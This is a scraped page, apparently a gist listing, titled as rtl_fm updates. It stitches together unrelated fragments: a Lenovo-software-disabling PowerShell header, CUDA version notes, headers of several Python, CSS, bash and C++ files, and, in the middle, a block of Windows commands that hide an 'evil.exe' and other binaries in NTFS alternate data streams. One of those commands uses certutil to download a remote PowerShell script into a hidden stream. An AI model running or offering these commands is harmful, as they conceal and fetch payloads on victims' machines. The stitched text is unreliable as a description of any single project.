Updates for rtl_fm overhaul
Source: Archived version from November 23, 2023
Updates for rtl_fm overhaul
Source: Archived version from November 23, 2023
# Version: 0.1 (2025-01-18) | |
# License: MIT, use at your own risk | |
# | |
# This script disables the Lenovo-installed "Tobii experience" software and "nahimic" software. | |
# Tested on a Lenovo Legion Pro 5 (82WM) with Windows 11 24H2. | |
# Run it with `powershell.exe -noprofile -executionPolicy Bypass -File badlenovo.ps1` | |
# Following this script, you should be able to uninstall the "Tobii experience" app from the control panel (appwiz.cpl) | |
# | |
# After major updates, you may need to re-run this script. |
In general, check the crt/host_config.h
file to find out which versions are supported.
Sometimes it is possible to hack the requirements there to get some newer versions working, too :)
Thrust version can be found in $CUDA_ROOT/include/thrust/version.h
.
Download Archives: https://developer.nvidia.com/cuda-toolkit-archive
Release notes for CUDA Toolkit (CTK):
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
#---------------------------------------------------------------------- | |
# lunar-lander-3.py - A demo of AI learning for landing physics on the moon, using pygame. | |
#---------------------------------------------------------- | |
import os, sys | |
import random, tempfile | |
import time | |
import numpy as np | |
import winsound |
/* main.css */ | |
header, footer { | |
font: 14px Arial, sans-serif; | |
padding: 8px; | |
color: white; | |
background-color: black; | |
clear: left; | |
text-align: left; | |
} |
#!/usr/bin/env python -u | |
# -*- coding: UTF-8 -*- | |
#------------------------------------------------------------------------------ | |
# Filename: fancycompleter.py | |
# Author: Antonio Cuni | |
# Mods: EABASE | |
# Last: 2022-01-30 | |
# License: BSD (from: setup.py in original repo) | |
# | |
#------------------------------------------------------------------------------ |
#!/bin/bash | |
#---------------------------------------------------------------------- | |
# Author: EABASE | |
# Date: 2022-01-16 | |
# Version: 1.1 | |
#---------------------------------------------------------------------- | |
# History: | |
# The original file was taken from iterm2 [1], and later modified | |
# by EABASE in [2]. | |
# |
# | |
# To resolve issue #903 in yfinance | |
# https://github.com/ranaroussi/yfinance/issues/903 | |
#---------------------------------------------------------- | |
# Date: 2021-12-19 | |
# | |
# The PEG Ratio Yahoo Finance Paths: | |
# | |
# The working curl: | |
# curl -s https://finance.yahoo.com/quote/{FE}/key-statistics?p={FE} | grep "root.App.main = " | sed -e "s/root.App.main = //" |sed 's/.$//'> dafuck_ok.json |
//--------------------------------------------------------------------- | |
// Name: HelloSDL2.cpp | |
// Author: EAML | |
// Date: 2021-05-16 | |
// | |
// Description: | |
// A minimal PoC for producing a native SDL2 Windows app that can | |
// be ran from either Windows Explorer or from Powershell console. | |
// It's designed to use minimal command line, compiler options, | |
// and dependencies... It will display a gray window for 2 sec's. |